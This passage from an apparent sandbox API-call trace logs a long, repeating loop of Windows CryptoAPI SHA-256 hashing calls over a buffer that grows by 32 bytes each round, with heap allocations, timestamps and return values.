phProv=0xceb00*=0x338233d0) returned 1 [0148.073] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.073] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0148.073] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58310 [0148.073] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.073] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0148.073] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.074] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.074] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0148.074] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58bb0 [0148.074] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0148.074] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.074] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0148.074] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.074] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0148.074] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58d90 [0148.074] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.074] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0148.074] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.075] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.075] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0148.075] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e589a0 [0148.075] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.075] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.075] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.076] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.076] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0148.076] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58520 [0148.076] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.076] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.076] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0148.077] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.077] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0148.077] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58c10 [0148.077] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.077] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0148.077] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0148.077] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.077] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0148.077] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58550 [0148.077] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.077] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0148.077] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.078] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.078] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0148.078] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58df0 [0148.078] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.078] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.078] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.079] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.079] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0148.079] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58580 [0148.079] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.079] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.079] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.079] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.080] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0148.080] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e585e0 [0148.080] CryptDestroyHash (hHash=0x332b7890) returned 1 [0148.080] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.080] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.080] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.080] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0148.080] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58a90 [0148.080] CryptDestroyHash (hHash=0x332b7900) returned 1 [0148.080] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.080] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0148.081] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.081] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0148.081] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58d30 [0148.081] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.081] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0148.081] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.082] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.082] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0148.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58d60 [0148.082] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.082] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.082] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338236d0) returned 1 [0148.082] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.082] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0148.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58eb0 [0148.082] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.082] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0148.082] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.086] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.086] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0148.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58be0 [0148.086] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.086] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.086] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.087] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.087] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0148.087] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58610 [0148.087] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.087] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.087] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.088] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.088] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0148.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e583a0 [0148.088] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.088] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.088] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821fd0) returned 1 [0148.089] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.089] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0148.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58640 [0148.089] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.089] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0148.089] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822fd0) returned 1 [0148.089] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.089] CryptHashData (hHash=0x332b7a50, pbData=0x32e4ee50, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0148.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58e20 [0148.089] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0148.089] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0148.089] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.090] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.090] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0148.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58670 [0148.090] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.090] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.090] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.091] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.091] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0148.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58e50 [0148.091] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.091] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.091] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.091] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.091] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0148.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e583d0 [0148.092] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.092] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.092] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.092] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.092] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0148.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58910 [0148.092] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.092] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.092] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0148.093] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.093] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0148.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58400 [0148.093] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.093] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0148.093] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.094] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.094] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0148.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e587c0 [0148.094] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.094] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.094] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.095] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.095] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0148.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e586d0 [0148.095] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.095] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.095] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.095] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.095] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0148.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58700 [0148.095] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.095] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.095] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0148.096] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.096] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0148.096] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58730 [0148.096] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.096] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0148.096] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0148.097] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.097] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0148.097] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e587f0 [0148.097] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.097] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0148.097] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.097] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.097] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0148.097] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58940 [0148.097] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.097] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.097] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822bd0) returned 1 [0148.098] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.098] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0148.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58850 [0148.098] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.098] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0148.098] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0148.099] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.099] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0148.099] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58880 [0148.099] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.099] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0148.099] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338233d0) returned 1 [0148.099] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.099] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0148.099] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58970 [0148.100] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.100] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0148.100] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.100] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.100] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0148.100] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e589d0 [0148.100] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0148.100] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.100] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0148.101] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.101] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0148.101] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58a00 [0148.101] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.101] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0148.101] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.102] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.102] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0148.102] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58a30 [0148.102] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.102] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.102] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.103] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.103] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0148.103] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58ac0 [0148.103] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.103] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.103] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0148.103] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.103] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0148.103] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58af0 [0148.103] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.103] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0148.103] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0148.104] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.104] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0148.104] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58b20 [0148.104] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.104] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0148.104] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.105] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.105] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0148.105] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.105] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.105] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, 